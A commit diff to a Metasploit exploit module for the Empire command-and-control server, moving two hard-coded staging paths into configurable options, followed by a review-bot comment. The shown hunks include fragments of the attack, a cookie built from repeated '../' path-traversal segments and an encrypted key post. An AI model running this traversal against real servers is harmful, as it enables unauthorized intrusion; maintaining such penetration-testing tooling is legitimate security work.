
author
wolfthefallen
committed
Moved the STAGE0_URI and STAGE1_URI resource paths into the datastore
1 parent e806466 commit 684feb6


1 file changed

+8
-4
lines changed

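--- a/modules/exploits/linux/http/empire_skywalker.rb
+++ b/modules/exploits/linux/http/empire_skywalker.rb
@@ -52,6 +52,8 @@ def initialize(info = {})
 [
 Opt::RPORT(8080),
 OptString.new('TARGETURI', [ false, 'Base URI path', '/' ]),
+OptString.new('STAGE0_URI', [ true, 'The resource requested by the initial launcher, default is index.asp', 'index.asp' ]),
+OptString.new('STAGE1_URI', [ true, 'The resource used by the RSA key post, default is index.jsp', 'index.jsp' ]),
 OptString.new('PROFILE', [ false, 'Empire agent traffic profile URI.', '' ])
 ], self.class)
 end
@@ -113,11 +115,12 @@ def rsa_key_to_xml(rsa_key)
 end
 
 def get_staging_key
-# empire STAGE0_URI index.asp
+# STAGE0_URI resource requested by the initial launcher
+# The default STAGE0_URI resource is index.asp
 # https://github.com/adaptivethreat/Empire/blob/293f06437520f4747e82e4486938b1a9074d3d51/setup/setup_database.py#L34
 res = send_request_cgi({
 'method' => 'GET',
-'uri' => normalize_uri(target_uri.path, 'index.asp')
+'uri' => normalize_uri(target_uri.path, datastore['STAGE0_URI'])
 })
 return unless res and res.code == 200
 
@@ -193,13 +196,14 @@ def exploit
 
 rsa_key = OpenSSL::PKey::RSA.new(2048)
 session_id = Array.new(50, '..').join('/')
-# empire STAGE1_URI index.asp
+# STAGE1_URI, The resource used by the RSA key post
+# The default STAGE1_URI resource is index.jsp
 # https://github.com/adaptivethreat/Empire/blob/293f06437520f4747e82e4486938b1a9074d3d51/setup/setup_database.py#L37
 res = send_request_cgi({
 'cookie' => "SESSIONID=#{session_id}",
 'data' => aes_encrypt(staging_key, rsa_key_to_xml(rsa_key)),
 'method' => 'POST',
-'uri' => normalize_uri(target_uri.path, 'index.jsp')
+'uri' => normalize_uri(target_uri.path, datastore['STAGE1_URI'])
 })
 fail_with(Failure::Unknown, 'Failed to send the RSA key') unless res and res.code == 200
 vprint_status("Successfully sent the RSA key")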
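Review bot: The two option descriptions added at new lines 55–56 repeat the default value in prose (`default is index.asp`), which msfconsole already prints from the option's default field and which will silently drift if the default is ever changed; the usual Metasploit form is a short description such as `OptString.new('STAGE0_URI', [ true, 'Resource requested by the initial Empire launcher (listener STAGE0_URI)', 'index.asp' ])` and likewise for STAGE1_URI. The hard-coded 'index.asp' and 'index.jsp' strings are replaced by datastore reads in get_staging_key and exploit, but if the module issues any other request to those resources outside these hunks (a check method, for instance), it would still need the same `datastore['STAGE0_URI']` lookup to stay consistent — worth confirming. Both get_staging_key and exploit continue past the end of the hunks shown here.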
